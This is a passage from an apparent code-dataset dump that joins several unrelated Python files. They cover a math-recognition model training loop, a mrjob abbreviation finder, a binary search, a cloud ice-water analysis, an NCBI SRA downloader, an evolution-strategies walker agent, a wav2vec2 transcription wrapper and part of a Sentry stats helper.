settings\n if multi_gpu_flag:\n batch_Imagesize = 500000\n valid_batch_Imagesize = 500000\n batch_size = 24\n valid_batch_size = 24\n else:\n batch_Imagesize = 500000\n valid_batch_Imagesize = 500000\n batch_size = args.batch_size\n valid_batch_size = batch_size\n maxImagesize = 500000\n\n maxlen = args.maxlen\n max_epochs = args.max_epochs\n lrate = args.lrate\n my_eps = args.eps\n decay_c = args.decay_c\n clip_c = args.clip_c\n\n # early stop\n estop = False\n halfLrFlag = 0\n bad_counter = 0\n patience = 15\n validStart = 10\n finish_after = 100000000\n\n # model architecture\n params = {}\n params['n'] = 256\n params['m'] = 256\n params['dim_attention'] = 512\n params['D'] = 684\n params['K'] = args.K ## num class : 106\n\n params['Kre'] = args.Kre ## num relation\n params['mre'] = 256\n params['maxlen'] = maxlen\n\n params['growthRate'] = 24\n params['reduction'] = 0.5\n params['bottleneck'] = True\n params['use_dropout'] = True\n params['input_channels'] = 1\n\n params['ly_lambda'] = 1.\n params['ry_lambda'] = 0.1\n params['re_lambda'] = 1.\n params['rpos_lambda'] = 1.\n params['KL_lambda'] = 0.1\n\n # load dictionary\n worddicts = load_dict(dictionaries[0])\n print ('total chars',len(worddicts))\n 
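# Added descriptive comment: invert the symbol->index dictionary into an index->symbol list;\n    # compute_sacc uses this reverse lookup later to map predicted ids back to symbol strings.\n    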
worddicts_r = [None] * len(worddicts)\n for kk, vv in worddicts.items():\n worddicts_r[vv] = kk\n\n reworddicts = load_dict(dictionaries[1])\n print ('total relations',len(reworddicts))\n reworddicts_r = [None] * len(reworddicts)\n for kk, vv in reworddicts.items():\n reworddicts_r[vv] = kk\n\n train,train_uid_list = dataIterator(datasets[0], datasets[1], datasets[2], worddicts, reworddicts,\n batch_size=batch_size, batch_Imagesize=batch_Imagesize,maxlen=maxlen,maxImagesize=maxImagesize)\n valid,valid_uid_list = dataIterator(valid_datasets[0], valid_datasets[1], valid_datasets[2], worddicts, reworddicts,\n batch_size=valid_batch_size, batch_Imagesize=valid_batch_Imagesize,maxlen=maxlen,maxImagesize=maxImagesize)\n # display\n uidx = 0 # count batch\n lpred_loss_s = 0. # count loss\n rpred_loss_s = 0.\n repred_loss_s = 0.\n mem_loss_s = 0.\n KL_loss_s = 0.\n loss_s = 0.\n ud_s = 0 # time for training an epoch\n validFreq = -1\n saveFreq = -1\n sampleFreq = -1\n dispFreq = 100\n if validFreq == -1:\n validFreq = len(train)\n if saveFreq == -1:\n saveFreq = len(train)\n if sampleFreq == -1:\n sampleFreq = len(train)\n\n # initialize model\n WAP_model = Encoder_Decoder(params)\n if init_param_flag:\n WAP_model.apply(weight_init)\n if multi_gpu_flag:\n WAP_model = nn.DataParallel(WAP_model, device_ids=[0, 1, 2, 3])\n if reload_flag:\n reload_path = sorted(get_filenames(model_path, extensions=['WAP_params.pkl'], recursive_=True))[-1]\n WAP_model.load_state_dict(torch.load(reload_path, map_location=lambda storage,loc:storage))\n WAP_model.cuda()\n\n # print model's parameters\n model_params = WAP_model.named_parameters()\n for k, v in model_params:\n print(k)\n\n # loss function\n # criterion = torch.nn.CrossEntropyLoss(reduce=False)\n # optimizer\n optimizer = optim.Adadelta(WAP_model.parameters(), lr=lrate, eps=my_eps, weight_decay=decay_c)\n\n print('Optimization')\n\n # statistics\n history_errs = []\n\n for eidx in range(max_epochs):\n n_samples = 0\n ud_epoch = time.time()\n random.shuffle(train)\n for x, ly, ry, re, ma, lp, rp in train:\n WAP_model.train()\n ud_start = time.time()\n n_samples += len(x)\n uidx += 1\n x, x_mask, ly, ly_mask, ry, ry_mask, re, re_mask, ma, ma_mask, lp, rp = \\\n prepare_data(params, x, ly, ry, re, ma, lp, rp)\n\n x = torch.from_numpy(x).cuda() # (batch,1,H,W)\n x_mask = torch.from_numpy(x_mask).cuda() # (batch,H,W)\n ly = torch.from_numpy(ly).cuda() # (seqs_y,batch)\n ly_mask = torch.from_numpy(ly_mask).cuda() # (seqs_y,batch)\n ry = torch.from_numpy(ry).cuda() # (seqs_y,batch)\n ry_mask = torch.from_numpy(ry_mask).cuda() # (seqs_y,batch)\n re = torch.from_numpy(re).cuda() # (seqs_y,batch)\n re_mask = torch.from_numpy(re_mask).cuda() # (seqs_y,batch)\n ma = torch.from_numpy(ma).cuda() # (batch,seqs_y,seqs_y)\n ma_mask = torch.from_numpy(ma_mask).cuda() # (batch,seqs_y,seqs_y)\n lp = torch.from_numpy(lp).cuda() # (seqs_y,batch)\n rp = torch.from_numpy(rp).cuda() # (seqs_y,batch)\n\n # permute for multi-GPU training\n # ly = ly.permute(1, 0)\n # ly_mask = ly_mask.permute(1, 0)\n # ry = ry.permute(1, 0)\n # ry_mask = ry_mask.permute(1, 0)\n # lp = lp.permute(1, 0)\n # rp = rp.permute(1, 0)\n\n # forward\n loss, lpred_loss, rpred_loss, repred_loss, mem_loss, KL_loss = \\\n WAP_model(params, x, x_mask, ly, ly_mask, ry, ry_mask, re, re_mask, ma, ma_mask, lp, rp)\n\n # recover from permute\n lpred_loss_s += lpred_loss.item()\n rpred_loss_s += rpred_loss.item()\n repred_loss_s += repred_loss.item()\n mem_loss_s += mem_loss.item()\n KL_loss_s += KL_loss.item()\n loss_s 
+= loss.item()\n\n # backward\n optimizer.zero_grad()\n loss.backward()\n if clip_c > 0.:\n torch.nn.utils.clip_grad_norm_(WAP_model.parameters(), clip_c)\n\n # update\n optimizer.step()\n\n ud = time.time() - ud_start\n ud_s += ud\n\n # display\n if np.mod(uidx, dispFreq) == 0:\n ud_s /= 60.\n loss_s /= dispFreq\n lpred_loss_s /= dispFreq\n rpred_loss_s /= dispFreq\n repred_loss_s /= dispFreq\n mem_loss_s /= dispFreq\n KL_loss_s /= dispFreq\n print ('Epoch', eidx, ' Update', uidx, ' Cost_lpred %.7f, Cost_rpred %.7f, Cost_re %.7f, Cost_matt %.7f, Cost_kl %.7f' % \\\n (np.float(lpred_loss_s),np.float(rpred_loss_s),np.float(repred_loss_s),np.float(mem_loss_s),np.float(KL_loss_s)), \\\n ' UD %.3f' % ud_s, ' lrate', lrate, ' eps', my_eps, ' bad_counter', bad_counter)\n ud_s = 0\n loss_s = 0.\n lpred_loss_s = 0.\n rpred_loss_s = 0.\n repred_loss_s = 0.\n mem_loss_s = 0.\n KL_loss_s = 0.\n\n # validation\n if np.mod(uidx, sampleFreq) == 0 and eidx >= validStart:\n print('begin sampling')\n ud_epoch_train = (time.time() - ud_epoch) / 60.\n print('epoch training cost time ... ', ud_epoch_train)\n WAP_model.eval()\n valid_out_path = valid_output[0]\n valid_malpha_path = valid_output[1]\n if not os.path.exists(valid_out_path):\n os.mkdir(valid_out_path)\n if not os.path.exists(valid_malpha_path):\n os.mkdir(valid_malpha_path)\n rec_mat = {}\n label_mat = {}\n rec_re_mat = {}\n label_re_mat = {}\n rec_ridx_mat = {}\n label_ridx_mat = {}\n with torch.no_grad():\n valid_count_idx = 0\n for x, ly, ry, re, ma, lp, rp in valid:\n for xx, lyy, ree, rpp in zip(x, ly, re, rp):\n xx_pad = xx.astype(np.float32) / 255.\n xx_pad = torch.from_numpy(xx_pad[None, :, :, :]).cuda() # (1,1,H,W)\n score, sample, malpha_list, relation_sample = \\\n gen_sample(WAP_model, xx_pad, params, multi_gpu_flag, k=3, maxlen=maxlen, rpos_beam=3)\n\n key = valid_uid_list[valid_count_idx]\n rec_mat[key] = []\n label_mat[key] = lyy\n rec_re_mat[key] = []\n label_re_mat[key] = ree\n rec_ridx_mat[key] = []\n label_ridx_mat[key] = rpp\n if len(score) == 0:\n rec_mat[key].append(0)\n rec_re_mat[key].append(0) # End\n rec_ridx_mat[key].append(0)\n else:\n score = score / np.array([len(s) for s in sample])\n min_score_index = score.argmin()\n ss = sample[min_score_index]\n rs = relation_sample[min_score_index]\n mali = malpha_list[min_score_index]\n for i, [vv, rv] in enumerate(zip(ss, rs)):\n if vv == 0:\n rec_mat[key].append(vv)\n rec_re_mat[key].append(0) # End\n break\n else:\n if i == 0:\n rec_mat[key].append(vv)\n rec_re_mat[key].append(6) # Start\n else:\n rec_mat[key].append(vv)\n rec_re_mat[key].append(rv)\n ma_idx_list = np.array(mali).astype(np.int64)\n ma_idx_list[-1] = int(len(ma_idx_list)-1)\n rec_ridx_mat[key] = ma_idx_list\n valid_count_idx=valid_count_idx+1\n\n print('valid set decode done')\n ud_epoch = (time.time() - ud_epoch) / 60.\n print('epoch cost time ... ', ud_epoch)\n\n if np.mod(uidx, saveFreq) == 0:\n print('Saving latest model params ... ')\n torch.save(WAP_model.state_dict(), last_saveto)\n\n # calculate wer and expRate\n if np.mod(uidx, validFreq) == 0 and eidx >= validStart:\n valid_cer_out = compute_wer(rec_mat, label_mat)\n valid_cer = 100. * valid_cer_out[0]\n valid_recer_out = compute_wer(rec_re_mat, label_re_mat)\n valid_recer = 100. * valid_recer_out[0]\n valid_ridxcer_out = compute_wer(rec_ridx_mat, label_ridx_mat)\n valid_ridxcer = 100. 
* valid_ridxcer_out[0]\n valid_exprate = compute_sacc(rec_mat, label_mat, rec_ridx_mat, label_ridx_mat, rec_re_mat, label_re_mat, worddicts_r, reworddicts_r)\n valid_exprate = 100. * valid_exprate\n valid_err=valid_cer+valid_ridxcer\n history_errs.append(valid_err)\n\n # the first time validation or better model\n if uidx // validFreq == 0 or valid_err <= np.array(history_errs).min():\n bad_counter = 0\n print('Saving best model params ... ')\n if multi_gpu_flag:\n torch.save(WAP_model.module.state_dict(), saveto)\n else:\n torch.save(WAP_model.state_dict(), saveto)\n\n # worse model\n if uidx / validFreq != 0 and valid_err > np.array(history_errs).min():\n bad_counter += 1\n if bad_counter > patience:\n if halfLrFlag == 2:\n print('Early Stop!')\n estop = True\n break\n else:\n print('Lr decay and retrain!')\n bad_counter = 0\n lrate = lrate / 10.\n params['KL_lambda'] = params['KL_lambda'] * 0.5\n for param_group in optimizer.param_groups:\n param_group['lr'] = lrate\n halfLrFlag += 1\n print ('Valid CER: %.2f%%, relation_CER: %.2f%%, rpos_CER: %.2f%%, ExpRate: %.2f%%' % (valid_cer,valid_recer,valid_ridxcer,valid_exprate))\n # finish after these many updates\n if uidx >= finish_after:\n print('Finishing after %d iterations!' % uidx)\n estop = True\n break\n\n print('Seen %d samples' % n_samples)\n\n # early stop\n if estop:\n break\n\n return True\n\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--dataset_type\", required=True, choices=['CROHME', '20K', 'MATHFLAT'], help=\"dataset type\")\n parser.add_argument(\"--concat_dataset_path\", type=str, help=\"Concated dataset path\")\n parser.add_argument(\"--train_path\", type=str, help=\"train data folder path\")\n parser.add_argument(\"--test_path\", type=str, help=\"test data folder path\")\n parser.add_argument(\"--multi_gpu_flag\", default=False, type=str2bool, help=\"whether use multi-GPUs\")\n parser.add_argument(\"--init_param_flag\", default=True, type=str2bool, help=\"whether init params\")\n parser.add_argument(\"--reload_flag\", default=False, type=str2bool, help=\"whether reload params\") ## True\n parser.add_argument('--batch_size', type=int, default=8, help='input batch size') ## 2\n parser.add_argument('--maxlen', type=int, default=200, help='maximum-label-length')\n parser.add_argument('--max_epochs', type=int, default=5000, help='maximum-data-epoch')\n parser.add_argument('--lrate', type=float, default=1.0, help='learning rate, default=1.0 for Adadelta')\n parser.add_argument('--eps', type=float, default=1e-6, help='eps for Adadelta. 
default=1e-6')\n    parser.add_argument('--decay_c', type=float, default=1e-4, help='decay-c')\n    parser.add_argument('--clip_c', type=float, default=100.0, help='clip-c')\n\n    parser.add_argument(\"--estop\", default=False, type=str2bool, help=\"whether use early stop\")\n\n    \"\"\" Model Architecture \"\"\"\n    parser.add_argument('--K', type=int, default=106, help='number of character label') # 112\n    parser.add_argument('--Kre', type=int, default=8, help='number of character relation')\n\n    args = parser.parse_args(argv)\n\n    return args\n\n\nSELF_TEST_ = True\nDATASET_TYPE = 'MATHFLAT' # CROHME / 20K / MATHFLAT\n\n\nif __name__ == '__main__':\n    if len(sys.argv) == 1:\n        if SELF_TEST_:\n            sys.argv.extend([\"--dataset_type\", DATASET_TYPE])\n            # sys.argv.extend([\"--reload_flag\", 'True'])\n            # sys.argv.extend([\"--batch_size\", '2'])\n            # sys.argv.extend([\"--K\", '112'])\n        else:\n            sys.argv.extend([\"--help\"])\n\n    main(parse_arguments(sys.argv[1:]))","sub_path":"codes/train_wap.py","file_name":"train_wap.py","file_ext":"py","file_size_in_byte":18354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"561758830","text":"from mrjob.job import MRJob\nfrom mrjob.protocol import TextProtocol\nimport re\n\n\nclass MRAbbreviationFinder(MRJob):\n\n    OUTPUT_PROTOCOL = TextProtocol\n    PATTERN_RE = re.compile(r'(?: |^)\\w+\\.[,;:?!]?(?: |$)\\w?')\n    ABBR_RE = re.compile(r\"\\w+\\.\")\n    PROB_THRESH = 0.7\n\n    def mapper(self, _, line):\n        for match in self.PATTERN_RE.findall(line):\n            if isinstance(match, str):\n                for abbr in self.ABBR_RE.findall(match):\n                    if isinstance(abbr, str):\n                        yield abbr.lower(), match[-1].islower()\n\n    def reducer(self, word, counters):\n        total, lower = 0, 0\n        for counter in counters:\n            if counter:\n                lower += 1\n            total += 1\n        if self.PROB_THRESH < lower/total and total > 25:\n            yield word, str((total, lower))\n\n\nif __name__ == \"__main__\":\n    MRAbbreviationFinder.run()","sub_path":"code/task2_5.py","file_name":"task2_5.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"26676867","text":"def binary_search(lst, search_item):\n    low = 0\n    high = len(lst) - 1\n    search_res = False\n\n    while low <= high and not search_res:\n        middle = (low + high) // 2\n        guess = lst[middle]\n        if guess == search_item:\n            search_res = True\n        if guess > search_item:\n            high = middle - 1\n        else:\n            low = middle + 1\n    return search_res\n\n\nlst = [3, 5, 11, 12, 15, 23, 25, 34, 67, 86]\nvalue = 67\nresult = binary_search(lst, value)\nif result:\n    print(\"Element found!\")\nelse:\n    print(\"Element not found.\")\n","sub_path":"BinarySearch.py","file_name":"BinarySearch.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"185626092","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 5 09:26:33 2019\n\n@author: Tristan O'Hanlon\n\nThis will create a dataset of specific cloud ice water content (kgm^-2) with latitude.\nData is stored in a 2D array cccm_tciw_lat \n[:,0] = latitude\n[:,1] = IWP\n\"\"\"\nimport time\nimport numpy as np\nfrom scipy import integrate\nfrom sklearn.impute import SimpleImputer\nimport os\nfrom pyhdf import SD\nimport matplotlib.pyplot as plt\nimport h5py\n\n#---get altitude in km---#\nos.chdir('E:/University/University/MSc/Models/climate-analysis/CCCM/raw_datasets') #Home PC\nf = h5py.File('2006_CCCM_profile_variables.h5', 'r')\n\nlat = f['lat'][:]\nalt 
= f['alt'][:]\ncff = f['cff'][:]\n\nalt = alt*1000\n\n#------------------------#\n\ntciw = [] # create a blank array to add cloud ice water content data\n\nos.chdir('E:/University/University/MSc/Models/Data/CCCM/2006') # Home PC\n\nstart = time.time()\n# Load every file in the directory\nfor filename in os.listdir(): \n    \n    # Load the file\n    f = SD.SD(filename)\n    # Get the cloud ice water content data as a list. (25536, 137) 'units': 'grams per cubic meter'\n    tciw = tciw+f.select('Ice water content profile used').get().tolist() #same as profile plots\n    \nif len(lat) != len(tciw):\n    exit('Invalid sizes of lat and tciw data')\n    \nend = time.time()\nprint('Importing data from files to lists took:', end - start, 's')\n\ntciw = np.array(tciw)\n\n#Set the large 'fill values' in the data to nan before averaging \ntciw[tciw > 20] = np.nan\n\n####################\n\n#fit all nan values to average\n\nimp = SimpleImputer(missing_values=np.nan, strategy='mean')\nimp.fit(np.transpose(tciw)) \na = imp.transform(np.transpose(tciw))\ntciw = np.transpose(a)\n\n####################\n#computing the total cloud ice water content (IWP) kgm^-2\n\ns_tciw = integrate.trapz(tciw, alt) # integrate across total altitude\na_tciw = -s_tciw / 1000 #convert g to kg\n\n\n# Join the two lists as if they were two columns side by side, into a list of two elements each\ncombined = np.vstack((lat, a_tciw)).T\n#print (\"combined\")\n#print (combined)\n\n#print(\"get unique lats\")\nunique = np.unique(lat)\n#print(unique)\n\n# Add a column for every additional column, -1 will sort by the first column\ncombined = combined[np.lexsort(np.transpose(combined)[:-1])]\n#print (\"sorted\")\n#print (combined)\n\n# Averages of (lat, cloud ice water content) empty array\naverages_total = unique.size\ncccm_tciw_lat = np.empty((averages_total,2),dtype=float)\n\n# Current subtotal of current lat\nsubtotal = 0.0\n# Current number of cloud ice water content entries in subtotal\nnumber = 0\n# Set the current lat to None\ncurrent_lat = None\n\n# Iterate through all of the (lat, cloud ice water content) elements and subtotal the same lat values\ni = 0\nfor item in combined:\n    \n    if np.isnan(item[1]):\n        continue\n\n    if current_lat is None:\n        \"\"\"\n        print(\"setting current_lat to item[0]\")\n        print(\"(current_lat == item[0]) = \", end='')\n        print(current_lat == item[0]) \n        \"\"\"\n        current_lat = item[0];\n        \n    # If the lat is not the same as last time, then perform the average calc and reset everything\n    if item[0] != current_lat:\n        \n        # Find the average value.\n        average = subtotal / number\n        \"\"\"\n        print(\"--------\")\n        print(\"lat: \", end='')\n        print(current_lat, end='')\n        print(\", avg: \", end='')\n        print(average, end='')\n        print(\", subtotal: \", end='')\n        print(subtotal, end='')\n        print(\", number: \", end='')\n        print(number)\n        \"\"\"\n        # Append the average\n        cccm_tciw_lat[i] = [current_lat, average]\n        # Reset the subtotal\n        subtotal = 0.0\n        number = 0\n        # Set the current latitude\n        current_lat = item[0]\n        # Move to the next index in the averages array\n        i+=1\n\n    # Add the next value to the subtotal\n    number+=1\n    subtotal+=item[1]\n    \n# Catch the last entry in the for loop\naverage = subtotal / number\ncccm_tciw_lat[i] = [current_lat, average]\n\n\"\"\"\nprint (\"averages\")\n# Iterate through all of the (lat,cloud ice water content) elements\nfor item in averages:\n    print(\"[\", end='')\n    print(item[0], end='')\n    print(\", \", end='')\n    print(item[1], end='')\n    print(\"]\\n\", end='')\n\"\"\"\n\ncccm_tciw_lat = 
cccm_tciw_lat[:,1]*cff\ncccm_tciw_lat = np.vstack((unique,cccm_tciw_lat)).T\n \nplt.figure()\nfig, ax = plt.subplots()\n#ax.plot(cccm_tciw_frac_lat[:,0],cccm_tciw_frac_lat[:,1], 'g', label='CCCM')\nax.plot(cccm_tciw_lat[:,0],cccm_tciw_lat[:,1], 'g', label='CCCM')\nax.legend(loc='lower center', bbox_to_anchor=(0.5, -0.3),\n          ncol=4, fancybox=True, shadow=True);\n\n#ax.set_ylabel('Cloud Ice Water Content Fraction', color='r') \nax.set_ylabel('Cloud Ice Water Content kg$m^{-2}$', color='r')\nax.set_xlabel('Latitude')\n\nplt.title('IWP vs Latitude - 2006')\nplt.show()\n\n\n#import h5py\n\nos.chdir('E:/University/University/MSc/Models/climate-analysis/CCCM/raw_datasets')\n# specify path and file name to create \nwith h5py.File('2006_CCCM_tciw_lata.h5', 'w') as p:\n    p.create_dataset('tciw', data=cccm_tciw_lat)\n    p.close()\n","sub_path":"old_scripts/CCCM/old_scripts/Retired 28.6.2019/2006_CCCM_lat_tciw.py","file_name":"2006_CCCM_lat_tciw.py","file_ext":"py","file_size_in_byte":5102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"203857826","text":"#! /usr/bin/env python\n\"\"\"\nDownloads and converts NCBI .sra files to FASTQ in parallel\n\"\"\"\n\nimport argparse\nimport multiprocessing\nimport os\nimport sys\n\n\n#from pathlib import Path\ndef parseCommandLineArguments():\n    \"\"\"\n    Parses the arguments provided through command line.\n    Launch python download_and_dump_fastq_from_SRA.py --help for more details\n    \"\"\"\n    parser = argparse.ArgumentParser(prog=\"download_and_dump_fastq_from_SRA.py\",\n                                     description=\"\"\"Parallel download of fastq data from NCBI. \n                                     Program will create the output directory if it is not present. \n                                     If fastq file is present, then downloading is skipped. \n                                     Program optimizes downloading of sra files and converting to fastq by utilizing multiple CPU cores. \n                                     \"\"\")\n    parser.add_argument(\"--sra\",\"-s\",help=\"Please enter the name of the file which has all the SRA ids listed one per line. Please note that bioproject IDs cannot be processed\",required=True)\n    parser.add_argument(\"--output\",\"-o\",help=\"Please enter the name of the output directory. 
Download will be skipped if file is present\",required=True)\n parser.add_argument(\"--cpu\",\"-n\",help=\"Enter the number of CPUs to be used.\",default=1)\n return parser.parse_args()\n\ndef readSRAfilesToBeDownloaded(filename):\n \"\"\"\n Reads and returns a list of the SRA ids to be downloaded\n \"\"\"\n return list(set([name.strip() for name in open(filename,\"r\").read().split(\"\\n\")]))\n\ndef downloadSRAFile(allinput):\n sra,default_path_to_download,output_directory=allinput\n os.system(\"prefetch -X 104857600 -O \"+output_directory+\"/\"+\" \"+sra+\" 2> \"+output_directory+\"/\"+sra+\".error\")\n cmd=\"fastq-dump -X 1 -Z --split-spot \"+output_directory+\"/\"+sra+\".sra|wc -l > \"+output_directory+\"/\"+sra+\".temp\"\n os.system(cmd)\n if int(open(output_directory+\"/\"+sra+\".temp\").read())==4:\n pair=\"single\"\n else:\n pair=\"paired\"\n cmd=\"fastq-dump --defline-seq '@$sn[_$rn]/$ri' --outdir \"+output_directory+\" --split-files \"+output_directory+\"/\"+sra+\".sra\"\n os.system(cmd)\n if pair==\"single\":\n os.system(\"mv \"+output_directory+\"/\"+sra+\"_1.fastq \"+output_directory+\"/\"+sra+\".fastq \")\n os.system(\"rm \"+output_directory+\"/\"+sra+\".sra \"+output_directory+\"/\"+sra+\".temp\")\n \ndef downloadSRAFilesAndConvertToFastq(SRAs,default_path_to_download,n,output_directory):\n \"\"\"\n Downloads the sra files and converts to fastq\n \"\"\"\n cmd=\"mkdir -p \"+output_directory\n os.system(cmd)\n pool = multiprocessing.Pool(processes=int(n))\n allinputs=[]\n os.system(\"rm -rf \"+output_directory+\"/*lock\")\n os.system(\"rm -rf \"+output_directory+\"/*tmp\")\n os.system(\"rm -rf \"+output_directory+\"/*error\")\n os.system(\"rm -rf \"+output_directory+\"/*temp\")\n for sra in SRAs:\n if os.path.exists(output_directory+\"/\"+sra+\".fastq\")==True or (os.path.exists(output_directory+\"/\"+sra+\"_1.fastq\")==True and os.path.exists(output_directory+\"/\"+sra+\"_2.fastq\")==True):\n if os.path.exists(output_directory+\"/\"+sra+\"_1.fastq\")==True and os.path.exists(output_directory+\"/\"+sra+\"_2.fastq\")==False:\n os.system(\"mv \"+output_directory+\"/\"+sra+\"_1.fastq \"+output_directory+\"/\"+sra+\".fastq\")\n continue\n allinputs.append([sra,default_path_to_download,output_directory])\n pool.map(downloadSRAFile,allinputs)\n \ndef verifyOutput(output_directory,SRAs):\n \"\"\"\n Verify the downloads\n \"\"\"\n for sra in SRAs:\n if os.path.exists(output_directory+\"/\"+sra+\".fastq\")==True:\n continue\n elif os.path.exists(output_directory+\"/\"+sra+\"_1.fastq\")==True and os.path.exists(output_directory+\"/\"+sra+\"_2.fastq\")==True:\n continue\n else:\n return 1\n return 0\n \ndef main():\n commandLineArg=sys.argv\n if len(commandLineArg)==1:\n print(\"Please use the --help option to get usage information\")\n options=parseCommandLineArguments()\n SRAs=readSRAfilesToBeDownloaded(options.sra)\n new_SRAs=[s for s in SRAs if s!=\"\"]\n SRAs=new_SRAs\n default_path_to_download=\"\"\n while verifyOutput(options.output,SRAs)==1:\n downloadSRAFilesAndConvertToFastq(SRAs,default_path_to_download,int(options.cpu),options.output)\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"utils/downloadAndDumpFastqFromSRA.py","file_name":"downloadAndDumpFastqFromSRA.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"233145208","text":"#############################\n\n\t# Working Evolution strategy No Library\n\n############################\n\n# Evolution Strategies 
BipedalWalker-v2\n# https://blog.openai.com/evolution-strategies/\n# gives good solution at around iter 100 in 5 minutes\n# for testing model set reload=True\n\nimport gym\nimport numpy as np\nimport cPickle as pickle\nimport sys\n\nenv = gym.make('Marvin-v0')\nnp.random.seed(10)\n\nhl_size = 100\nversion = 2\nnpop = 40\nsigma = 0.2\nalpha = 0.06\niter_num = 300\naver_reward = None\nallow_writing = True\nreload = False\n\n#print (env.reset())\n\n#print(hl_size, version, npop, sigma, alpha, iter_num)\n\nif reload:\n\tmodel = pickle.load(open('model-pedal%d.p' % version, 'rb'))\nelse:\n\tmodel = {}\n\tmodel['W1'] = np.random.randn(24, hl_size) / np.sqrt(24)\n\tmodel['W2'] = np.random.randn(hl_size, 4) / np.sqrt(hl_size)\n\n\t#print (\"MODEL: %s\" % model)\n\ndef get_action(state, model):\n\thl = np.matmul(state, model['W1'])\n\thl = np.tanh(hl)\n\taction = np.matmul(hl, model['W2'])\n\taction = np.tanh(action)\n\n\t#print (\"ACTION %s\" % (action))\n\n\treturn action\n\ndef f(model, render=False):\n\tstate = env.reset()\n\ttotal_reward = 0\n\tfor t in range(iter_num):\n\t\tif render: env.render()\n\n\t\taction = get_action(state, model)\n\t\tstate, reward, done, info = env.step(action)\n\t\ttotal_reward += reward\n\n\t\tif done:\n\t\t\tbreak\n\treturn total_reward\n\nif reload:\n\titer_num = 10000\n\tfor i_episode in range(10):\n\t\tf(model, True)\n\tsys.exit('demo finished')\n\nfor i in range(10001):\n\t#print (\"TRAINING???\")\n\tN = {}\n\tfor k, v in model.iteritems():\n\t\tN[k] = np.random.randn(npop, v.shape[0], v.shape[1])\n\t\t#print (\"K: %s V: %s\" % (k, v))\n\t\t#print (\"N[%s]: %s\" % (k, N[k]))\n\tR = np.zeros(npop)\n\t#print (\"NEXT ONE, PLEASE!!!\")\n\n\tfor j in range(npop):\n\t\tmodel_try = {}\n\t\tfor k, v in model.iteritems():\n\t\t\tprint (\"K is: %s\" % (k))\n\t\t\tmodel_try[k] = v + sigma*N[k][j]\n\t\tR[j] = f(model_try)\n\n\tA = (R - np.mean(R)) / np.std(R)\n\tfor k in model:\n\t\tmodel[k] = model[k] + alpha/(npop*sigma) * np.dot(N[k].transpose(1, 2, 0), A)\n\n\tcur_reward = f(model)\n\taver_reward = aver_reward * 0.9 + cur_reward * 0.1 if aver_reward != None else cur_reward\n\t#print('iter %d, cur_reward %.2f, aver_reward %.2f' % (i, cur_reward, aver_reward))\n\n\tif i % 10 == 0 and allow_writing:\n\t\t#print (\"Model is %s: \" % (model))\n\t\tpickle.dump(model, open('model-pedal%d.p' % version, 'wb'))","sub_path":"evo_nolib.py","file_name":"evo_nolib.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"222280868","text":"import soundfile as sf\nimport torch\nfrom transformers import Wav2Vec2Processor, Wav2Vec2ForCTC\n\n# Improvements: \n# - gpu / cpu flag\n# - convert non 16 khz sample rates\n# - inference time log\n\nclass Wave2Vec2Inference():\n def __init__(self,model_name):\n self.processor = Wav2Vec2Processor.from_pretrained(model_name) \n self.model = Wav2Vec2ForCTC.from_pretrained(model_name)\n\n def buffer_to_text(self,audio_buffer):\n if(len(audio_buffer)==0):\n return \"\"\n\n inputs = self.processor([audio_buffer], sampling_rate=16_000, return_tensors=\"pt\", padding=True)\n\n with torch.no_grad():\n logits = self.model(inputs.input_values).logits\n\n predicted_ids = torch.argmax(logits, dim=-1) \n transcription = self.processor.batch_decode(predicted_ids)[0]\n return transcription.lower()\n\n def file_to_text(self,filename):\n audio_input, samplerate = sf.read(filename)\n assert samplerate == 16000\n return self.buffer_to_text(audio_input)\n\nif __name__ == 
\"__main__\":\n print(\"Model test\")\n asr = Wave2Vec2Inference(\"maxidl/wav2vec2-large-xlsr-german\")\n text = asr.file_to_text(\"test.wav\")\n print(text)","sub_path":"wav2vec2_inference.py","file_name":"wav2vec2_inference.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"117312432","text":"import re\n\nimport requests\n\n\nSENTRY_STAT_PERIOD_DAY = '24h'\nSENTRY_STAT_PERIOD_FORTNIGHT = '14d'\n\n\ndef auth_token(token):\n def inner(request):\n request.headers['Authorization'] = 'Basic {}'.format(token)\n return request\n return inner\n\n\ndef stringify(value):\n try:\n return str(value)\n except UnicodeEncodeError:\n return repr(value)\n\n\ndef run_command(fct, cfg, issue, line):\n if not issue:\n return line, issue\n\n try:\n fct(cfg, issue)\n return line, issue\n except requests.exceptions.ConnectionError as e:\n return '{} --> ERROR, {}'.format(line, e), issue\n\n\ndef grouper(iterable, n):\n \"\"\"Collect data into fixed-length chunks or blocks\"\"\"\n block = []\n for index, item in enumerate(iterable, start=1):\n block.append(item)\n\n if index % n == 0:\n yield block\n block.clear()\n\n yield block\n\n\ndef confirm(message, accepted_values, default=None):\n confirmation = None\n while not confirmation or confirmation not in accepted_values:\n confirmation = input(message).lower() or default\n return confirmation\n\n\ndef decode_period(period):\n pattern = r'^(?P\\d+)(?P[hd])$'\n matched = re.search(pattern, period)\n if not matched:\n raise RuntimeError('Bad period format: %s, should be \\d+(h|d).' % period)\n\n data = matched.groupdict()\n unit = data['unit']\n value = int(data['value'])\n\n assert unit == 'd' or value <= 12, '12h is the maximum available period.'\n assert unit == 'h' or value <= 7, '7d is the maximum available period.'\n\n return (\n SENTRY_STAT_PERIOD_DAY if unit == 'd' else SENTRY_STAT_PERIOD_FORTNIGHT,\n value if unit == 'd' else 0,\n value if unit == 'h' else 0,\n )\n\n\ndef compute_events_stats(stats_period, period_length, threshold, issue):\n occurrences = issue['stats'][stats_period]\n latest_index = 24 if 